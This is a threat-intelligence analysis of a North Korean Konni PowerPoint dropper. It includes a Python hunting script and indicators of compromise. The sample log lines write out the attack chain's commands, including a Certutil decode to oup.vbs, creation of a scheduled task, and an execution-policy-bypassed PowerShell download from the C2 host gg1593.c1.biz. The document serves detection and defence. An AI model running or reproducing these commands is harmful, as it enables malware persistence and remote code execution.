PowerPoint malware created by the North Korean hacking group Konni (2023.5.24)

2023-05-31 Sakai PowerPoint malware created by North Korean hacking group Konni (2023.5.24)

https://wezard4u.tistory.com/6456


The Korean write-up analyzes a PowerPoint sample that the source attributes to Konni, a North Korean hacking group it associates with Thallium/APT37 and possibly Kimsuky. The lure is presented as a PPTX file but carries a VBA macro that displays a fake PowerPoint version error, writes a Base64 blob to disk, decodes it with Certutil into %LOCALAPPDATA%\Microsoft\Office\oup.vbs, and runs that script after a delay. The decoded script registers a scheduled task named “Office Updatev2.2” that fires every five minutes and launches PowerShell with the execution policy bypassed; the PowerShell stage downloads Base64 content from gg1593.c1.biz/dn.php, passing the host name and OS version as request parameters, and then loads and invokes the returned .NET assembly. Certutil decoding a non-certificate file into an Office-named directory, and a scheduled task spawning PowerShell with an execution-policy bypass, are both living-off-the-land patterns worth alerting on independently of the domain indicator. The source lists representative hashes for the PPTX sample, including SHA-256 b97e12807dcde2a8fd53d7f8e74336442d0cf8dbed19c0a44fcef359160bdd77.
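As an added hunting example (this is not code from the write-up or from the source page), the script below matches process-creation events against the four stages of the chain described above: the Certutil decode into oup.vbs, the script host running oup.vbs, creation of the “Office Updatev2.2” task, and the execution-policy-bypassed PowerShell beacon to gg1593.c1.biz. The `<timestamp>|<Image>|<CommandLine>` log format and the SAMPLE_EVENTS lines are constructed for illustration; the dn.php query string is left out of the sample because the published URL indicator is truncated.

```python
"""Hunt for the Konni PowerPoint dropper chain in process-creation logs.

Added example; not code from the write-up. The '<ts>|<Image>|<CommandLine>'
log format and SAMPLE_EVENTS are constructed for illustration.
"""
import re

# Indicators taken from the write-up (compared case-insensitively)
C2_HOST = "gg1593.c1.biz"
TASK_NAME = "office updatev2.2"
DROP_PATH = r"\microsoft\office\oup.vbs"        # under %LOCALAPPDATA%
PPTX_SHA256 = "b97e12807dcde2a8fd53d7f8e74336442d0cf8dbed19c0a44fcef359160bdd77"


def _image_is(image, *names):
    return image.lower().endswith(names)


# Each stage of the chain is (rule_name, predicate(image, cmdline)).
RULES = [
    # VBA stage: certutil turning the dropped Base64 blob into oup.vbs
    ("certutil_decode_to_oup_vbs",
     lambda img, cmd: _image_is(img, "certutil.exe")
     and re.search(r"\s-decode\s", cmd, re.I) is not None
     and DROP_PATH in cmd.lower()),
    # the decoded script being run after the delay
    ("script_host_runs_oup_vbs",
     lambda img, cmd: _image_is(img, "wscript.exe", "cscript.exe")
     and DROP_PATH in cmd.lower()),
    # persistence: the five-minute "Office Updatev2.2" task (schtasks form)
    ("schtasks_office_updatev2_2",
     lambda img, cmd: _image_is(img, "schtasks.exe")
     and re.search(r"/create\b", cmd, re.I) is not None
     and TASK_NAME in cmd.lower()),
    # beacon: execution-policy bypass plus the dn.php host
    ("powershell_bypass_to_c2",
     lambda img, cmd: _image_is(img, "powershell.exe", "pwsh.exe")
     and re.search(r"-(ep|exec\w*)\s+bypass", cmd, re.I) is not None
     and C2_HOST in cmd.lower()),
]
CHAIN = [name for name, _ in RULES]


def parse_event(line):
    """Constructed format: '<ISO timestamp>|<Image path>|<CommandLine>'."""
    ts, image, cmdline = line.rstrip("\n").split("|", 2)
    return ts, image, cmdline


def hunt(lines):
    """Return (timestamp, rule_name, image) for every rule an event trips."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        ts, image, cmdline = parse_event(line)
        for name, pred in RULES:
            if pred(image, cmdline):
                hits.append((ts, name, image))
    return hits


def missing_stages(hits):
    """Stages of the chain with no hit (empty list means the full chain was seen)."""
    seen = {name for _, name, _ in hits}
    return [name for name in CHAIN if name not in seen]


def is_known_sample(sha256_hex):
    """True if a file's SHA-256 equals the published PPTX sample hash."""
    return sha256_hex.strip().lower() == PPTX_SHA256


# Constructed sample events: one full chain plus a benign certutil call.
SAMPLE_EVENTS = [
    r"2023-05-24T09:00:01|C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE|POWERPNT.EXE C:\Users\u\Downloads\lure.pptx",
    r"2023-05-24T09:00:03|C:\Windows\System32\certutil.exe|certutil -decode C:\Users\u\AppData\Local\Microsoft\Office\tmp.txt C:\Users\u\AppData\Local\Microsoft\Office\oup.vbs",
    r"2023-05-24T09:00:33|C:\Windows\System32\wscript.exe|wscript.exe C:\Users\u\AppData\Local\Microsoft\Office\oup.vbs",
    r'2023-05-24T09:00:34|C:\Windows\System32\schtasks.exe|schtasks /create /tn "Office Updatev2.2" /sc minute /mo 5 /tr powershell.exe',
    # query string omitted: the published URL indicator is truncated
    r"2023-05-24T09:05:00|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -ep bypass -c IEX(...) http://gg1593.c1.biz/dn.php",
    # benign certutil use that must not fire
    r"2023-05-24T10:00:00|C:\Windows\System32\certutil.exe|certutil -hashfile C:\Users\u\setup.exe SHA256",
]

if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for ts, rule, image in found:
        print(ts, rule, image)
    print("missing stages:", missing_stages(found) or "none")
```

The write-up does not say how oup.vbs registers the task; if it uses the Task Scheduler COM interface rather than spawning schtasks.exe, no process event will carry the task name, so match “Office Updatev2.2” against task-registration events (Security event 4698) or a `schtasks /query` listing as well. Each rule also stands on its own: the Certutil and execution-policy rules stay useful after the actor rotates the domain.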

Indicators of Compromise

Type    Value                                                                  First seen  Last seen
DOMAIN  gg1593.c1.biz                                                          2022-08-26  2024-09-05
HASH    3a3ce0a1794b548682167da692052dc2 (32 hex digits, MD5 length)           2023-05-31  2023-05-31
HASH    b97e12807dcde2a8fd53d7f8e743364… (SHA-256 prefix; full value above)    2023-05-31  2023-05-31
HASH    061e17f3b2fd4a4dce1bf4f8a311982… (truncated in source)                 2023-05-31  2023-05-31
HASH    9f94236a481b957890cc7f7a85dc905… (truncated in source)                 2023-05-31  2023-05-31
URL     http://gg1593.c1.biz/dn.php?nam… (query string truncated in source)    2023-05-31  2023-05-31
URL     http://gg1593.c1.biz/dn.php                                            2022-08-26  2023-05-31
